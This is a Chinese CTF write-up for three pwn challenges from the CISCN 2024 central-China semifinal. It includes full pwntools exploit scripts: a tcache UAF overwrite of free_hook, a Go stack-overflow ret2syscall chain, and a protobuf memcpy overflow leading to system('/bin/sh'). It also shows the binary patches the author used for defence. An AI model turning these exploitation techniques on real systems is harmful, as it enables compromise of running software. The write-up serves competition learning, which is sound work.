[CISCN2024]华中赛区半决赛 PWN部分题解

[CISCN2024]华中半决赛 PWN部分题解

这次比赛中我攻击了2道,防御了3道

note

一道2.31堆题,保护全开,存在UAF漏洞

攻击

先填满tcache bin然后利用unsorted bin泄露libc地址,再UAF修改tcache的fd指针为free_hook,再将system函数的地址写入free_hook,最后触发free函数getshell即可

exp

from pwn import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug', terminal = ['tmux','splitw','-h'])
#p = remote('8.147.133.173', 19426)
p = process("./pwn")
#elf = ELF('./pwn')
libc=ELF("./libc.so.6")


def add(size,c):
	rl("5. exit\n")
	sl(str(1))
	rl("The size of your content: \n")
	sl(str(size))
	rl("content: \n")
	s(c)

def edit(idx,size,c):
	rl("5. exit\n")
	sl(str(2))
	rl("index: ")
	sl(str(idx))
	rl("The size of your content: \n")
	sl(str(size))
	rl("Content: \n")
	s(c)

def free(idx):
	rl("5. exit\n")
	sl(str(3))
	rl("index: ")
	sl(str(idx))

def show(idx):
	rl("5. exit\n")
	sl(str(4))
	rl("index: ")
	sl(str(idx))


for i in range(10):
	add(0x90,b'/bin/sh\x00')

for i in range(7):
	free(i)
free(7)
#debug('b *$rebase(0x15D0)')
show(7)
#libc_base=u64(rl(b'\x0a')[-7:-1].ljust(8, b'\x00'))-libc.sym['__malloc_hook']-96-0x10
libc_base = get_addr()-libc.sym['__malloc_hook']-96-0x10
lg("libcbase",libc_base)
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()

edit(6,0x90,p64(free_hook))
#debug('b *$rebase(0x1370)')
add(0x90,b'a')
add(0x90,p64(system))

free(9)
inter()

防御

这里我将删除功能里的call free直接nop掉,防御成功

go_note

一道go的菜单题,一开始还以为是go heap想直接放弃的(看到go就想吐

但之后仔细看一下发现就是栈溢出,漏洞点在edit功能

  str = content.str;
  for ( j = 0LL; j < content.len; ++j )
  {
    *(_BYTE *)v8 = *str;
    v8 = (__int128 *)((char *)v8 + 1);
    ++str;
  }

攻击

调试看一下溢出偏移,然后ret2syscall就行

这里要提一嘴,找gadget有点麻烦,要用--depth参数增加搜索深度,然后选择一些不影响参数寄存器的gadget来用

ROPgadget --binary ./note --only "pop|ret|add|mov|xor" --depth 30 |grep "pop rsi"

exp

from pwn import *
p = process('./note')

rax=0x000000000040fbdd  #pop rax; pop rbp; ret; 
rdx=0x000000000047a8fa  #pop rdx ; ret
rdi=0x0000000000462498  #pop rdi ; add eax, 0xc1894800 ; mov rax, rdx ; add rsp, 0xf8 ; pop rbp ; ret
rsi=0x0000000000462552  #pop rsi; add eax, 0xc1894800d; xor eax, eax; add rsp, 0xf8; pop rbp; ret; 
syscall=0x000000000045e0a9
bss=0x526680+0x1000
p.recvuntil("choice > ")
p.sendline(str(1))
p.recvuntil("note content: ")
p.sendline(b'a')

payload=b'a'*(0x40)+p64(rdi)+p64(0)+b'a'*0xf8+p64(bss)+p64(rsi)+p64(bss)+b'a'*0xf8+p64(bss)+p64(rdx)+p64(0x100)+p64(syscall)
payload+=p64(rdi)+p64(bss)+b'a'*0xf8+p64(bss)+p64(rsi)+p64(0)+b'a'*0xf8+p64(bss)+p64(rdx)+p64(0)+p64(rax)+p64(0x3b)+p64(syscall)*2

p.recvuntil("choice > ")
p.sendline(str(3))
p.recvuntil("Please input note id:")
p.sendline(str(1))
p.recvuntil("Please input new content:")

p.sendline(payload)
p.send(b'/bin/sh\x00')

p.interactive()

防御

这里我是直接把*(_BYTE *)v8 = *str;这条语句nop掉了,对应000000000047F3DF mov [r12], r13b这条指令

protoverflow

一道简单的protobuf栈溢出题,比赛的时候因为工具出了点问题导致没能打出来,但防御成功了

赛后自己再重新做了一遍,懒得patch libc,就直接用本机的libc打了(

攻击

漏洞就在memcpy那里

exp

from pwn import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------

import message_pb2
context(os='linux', arch='amd64', log_level='debug', terminal = ['tmux','splitw','-h'])

elf_patch = './pwn'
p = process([elf_patch], env= {"LD_LIBRARY_PATH":"./"})
elf = ELF(elf_patch)
libc = ELF(p.libc.path)

# debug('b *$rebase(0x332f)')

rl(b'0x')
libc_base = int(r(12), 16) - libc.sym['puts']



rdi = libc_base + 0x000000000002a3e5
ret = rdi + 1


system, binsh = get_sb()

pl = b'a'*0x218
pl += p64(ret) + p64(rdi) + p64(binsh) + p64(system)

msg = message_pb2.protoMessage()
msg.name="1"
msg.phoneNumber="2"
msg.buffer = pl
msg.size = len(pl)
serialized_msg = msg.SerializeToString()

s(serialized_msg)

lg('libc_base', libc_base) 

inter()

防御

将memcpy的size参数改成0x200即可,因为设置该参数的汇编指令mov edx, [rbp-0Ch]只有三个字节的长度,但mov edx,0x200有五个字节,所以不能在原指令上直接修改,这里考虑跳转到eh_frame段(在eh_frame段里随便找个看着顺眼的地址)

如果用CE写过汇编脚本,那下面这个应该更好理解

0x0331B:
	jmp eh_frame
	nop ;nop来补齐六个字节

eh_frame:
	mov edx,0x200 ;设置size参数为0x200
	mov rcx, [rbp-8] ;还原被覆盖的指令
	jmp 0x3322 ;跳转回去

热门相关:大师救命   吹神   满级绿茶穿到八十年代重新做人   娇妻在上,蜜蜜宠!   煌煌天道无上剑宗